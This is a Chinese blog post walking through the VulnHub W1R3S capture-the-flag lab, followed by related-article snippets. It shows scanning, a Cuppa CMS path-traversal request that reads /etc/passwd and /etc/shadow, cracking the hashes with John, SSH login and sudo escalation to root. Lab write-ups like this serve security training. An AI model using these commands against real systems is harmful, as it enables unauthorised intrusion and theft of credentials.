w1r3s-101打靶思路详解(vulnhub)

最新推荐文章于 2024-04-29 00:38:30 发布
最新推荐文章于 2024-04-29 00:38:30 发布
阅读量462 收藏 7
点赞数 7
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MCcming/article/details/136508292
版权

w1r3s-101打靶思路详解(vulnhub)

第一步:信息收集–主机发现和端口扫描

使用nmap快速对局域网进行扫描来确定靶机IP

nmap -sn 192.168.31.0/24

确定靶机IP为192.168.31.105

再次使用nmap对靶机IP进行详细扫描

nmap -p- -sV -sT -O 192.168.31.105

结果如下

在这里插入图片描述

发现开放了21,22,80,3306端口

第二步:WEB渗透

访问http://192.168.31.105/

在这里插入图片描述

发现是apache的初始界面

使用dirb扫描目录

dirb http://192.168.31.105/

发现结果非常多,那就写入dirb文件中,然后使用python匹配一下

dirb http://192.168.31.105/ > dirb

在这里插入图片描述

分别访问可以发现有cuppa和wordpress这两个cms组成

wordpress 直接用wpscan扫描一下

wpscan --url http://192.168.31.105/wordpress/index.php

cuppa 用searchsploit搜索一下

searchsploit cuppa

查看

searchsploit -p  25971

在这里插入图片描述

根据结果访问https://www.exploit-db.com/exploits/25971

在这里插入图片描述

可以看到漏洞出现的位置,关键代码以及exp

使用我们直接利用访问http://192.168.31.105/administrator/alerts/alertConfigField.php?urlConfig=…/…/…/…/…/…/…/…/…/etc/passwd

在这里插入图片描述

那换成POST请求

在这里插入图片描述

可以了,然后读取/etc/shadow

在这里插入图片描述

然后将有hash值的用户列写入password.txt

在这里插入图片描述

第三步:后渗透

使用John进行爆破密码

john password.txt

然后查看

john password.txt --show

在这里插入图片描述

使用ssh登入

ssh w1r3s@192.168.31.105

在这里插入图片描述

然后查看权限

sudo -l

在这里插入图片描述

发现是全部权限

接下来就简单了

sudo /bin/bash

然后就读取flag了

在这里插入图片描述

至此完结,撒花。

MCcming
关注
  • 7
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
5-vulnhub W1R3S 1
weixin_45345568的博客
06-29 1060
5-vulnhub W1R3S 1 下载地址为:https://www.vulnhub.com/entry/w1r3s-101,220/ 本次的靶机ip为192.168.3.24(桥接模式自动获取) 目标:得到root权限 找到flag 一、信息搜集 1.扫描目标ip,这里使用arp-scan -l 2.扫描端口,这里使用nmap 命令为nmap -p 1-65535 -sV 192.168.3.24 nmap -p 1-65535 -sV 192.168.3.24 Starting Nmap 7.70
W1R3S - VulnHub(漏洞靶机渗透测试)
Start C的博客
12-05 1041
VulnHub靶机学习 - W1R3S
红队笔记-1:W1R3S: 1.0.1打靶流程(vulnhub
qq_63442530的博客
03-13 1032
1.主机发现&端口扫描:主机发现目标主机ip:192.168.254.141,发现存活端口:21(tcp)22(ssh) ,80(http),3306(mysql)
红队打靶W1R3S: 1.0.1详细打靶思路vulnhub
Bossfrank的博客
05-30 3758
本文是vulnhub靶机W1R3S: 1.0.1详细打靶过程,使用kali进行渗透。不同于单纯的writeup,本文详细提供了渗透的思路和每一步的用意。
全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(三)w1r3s-101
hyjcking的博客
11-24 1158
在游览器中输入上面的url,页面没有回显,但是可以肯定的是这个php文件是存在的,可能是因为这个网站的cms经过二次开发导致目录结构发生改变,所以无法访问通,所以我打算使用curl对参数urlconfig进行urlencode编码。接下来我们只需要破解这段密文即可,把拥有密码的几个用户全部保存到pass.txt文档上(在桌面创建一个),然后命令:john pass.txt跑出密码。接下来的步骤就很明朗了,直接去百度上搜cuppa cms的漏洞,找到漏洞编号。开启靶机之后先扫了一下内网IP找到靶机的IP。
打靶vulnhub中的w1R3S
qq_73865998的博客
04-03 1937
复现视频:【「红队笔记」靶机精讲:W1R3S 1.0.1 - 渗透测试思路为王,细节多到即使对于纯萌新也能无感入圈。红队笔记(一个很宝藏的up主)。
红队打靶:JARBAS详细打靶思路vulnhub
Bossfrank的博客
06-03 1897
本文是vulnhub靶机JARBAS详细打靶过程,使用kali进行渗透。不同于单纯的writeup,本文详细提供了渗透的思路和每一步的用意。
红队靶机渗透-W1R3S 1.0.1
m0_57967573的博客
04-29 1786
nmap扫描获得了系统的4个端口,21,22,80,3306,都是标准的服务端口;对4个端口排布之后,先看了匿名的FTP,获得了若干文件文件,逐一查看,该破解的破解,该做字符处理的字符处理;然后看了3306是禁止连接的;80端口先是目录爆破,得到3个目录wordpress、javascript、administrator,javascript是无法访问的,因为wordpress的路径问题当时没有配置成功,需要做大的调整,所以暂时放弃了这条路······
w1r3s-editable渗透笔记
weixin_73094474的博客
03-01 1620
做好信息收集,多收集一些信息对渗透成功有很大的作用,一些常见的端口渗透,目录扫描等对第三方管理系统或者是其他系统做重点渗透,查看是否有对应的poc或exp学会使用john开膛用户密码sudo -l的简单提权。
【原创】项目五w1r3s.v1.0.doc
07-12
【原创】项目五w1r3s.v1.0.doc
小白的靶机-VulnHub-W1R3S
wo41ge的博客
12-14 334
靶机地址:https://www.vulnhub.com/entry/w1r3s-101,220/ 目标:得到root权限&找到flag.txt 开机界面 就是个这 确定靶机地址:192.168.120.134 使用namp进行全盘扫面 开放了21,22,80,3306端口 80端口 竟然在 那就上web页面呗 翻了半天 每个锤子东西 使用dirb工具攻击目录 命令:dirb http://192.168.120.134 找到了几个重要的目录,/administrator、/insta
SE-Net:Squeeze-and-Excitation Networks论文详解
weixin_47166887的博客
10-27 6021
注意力机制的文章之------通道注意力 SE-Net:Squeeze-and-Excitation Networks论文详解 论文链接:https://arxiv.org/pdf/1709.01507.pdf Github代码:https://github.com/hujie-frank/SENet 注意力机制最早用于自然语言处理(NLP),后来在计算机视觉(CV)也得到广泛的应用,之后注意力机制便被引入来进行视觉信息处理。注意力机制的核心思想就是能够从大量的信息中筛选出重要的信息。注意力机制可以分为通道
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8443
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
2006-2021 中国各地万达广场地理分布数据.zip
09-03
万达广场是城市综合体及其公共空间的主要实践者,在有利于城市综合体的发展的背景下,各地房地产的业务将向城市综合体方向倾向,如万达、中粮等国内知名房地产集团。万达集团是较早进入商业地产开发的企业,具有成熟的模式、完善的产业链、丰富的商业资源及运营能力。万达广场从2002年开始在全国各地开发和发展,是城市综合体及其公共空间实践的主力。 万达广场内容包括大型商业中心、商业步行街、五星级酒店、写字楼、公寓等,集购物、餐饮、文化、娱乐等多种功能于一体,形成独立的大型商圈。 万达广场是企业效益和社会效益的和谐统一,产生四大社会效益:提升城市商业档次、新增大量就业岗位、创造持续巨额税收、丰富群众消费需求。 数据指标 项目名称、项目信息、地点、开业时间、商业面积、经度、纬度。
【创新未发表】Matlab实现布谷鸟优化算法CS-GRU实现风电数据预测算法研究.rar
最新发布
09-03
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 替换数据可以直接使用,注释清楚,适合新手 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
【创新发文】基于雪融优化算法SAO-DELM的多输入单输出预测Matlab实现.rar
09-03
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 替换数据可以直接使用,注释清楚,适合新手 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
一套PPT教学模版工作汇报总结
09-03
PPT模板,即PowerPoint模板,是一种预先设计好的幻灯片格式,它包含了特定的布局、配色方案、字体样式和可能还有一些预设的图形和图像。使用PPT模板可以帮助用户快速创建具有专业外观的演示文稿,而无需从头开始设计每一个幻灯片。
iOS编写的Demo【ReactiveObjC、切换App_Logo、多线程、Runtime、Col_StudyiOS.zip
09-03
iOS编写的Demo【ReactiveObjC、切换App_Logo、多线程、Runtime、Col_StudyiOS
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值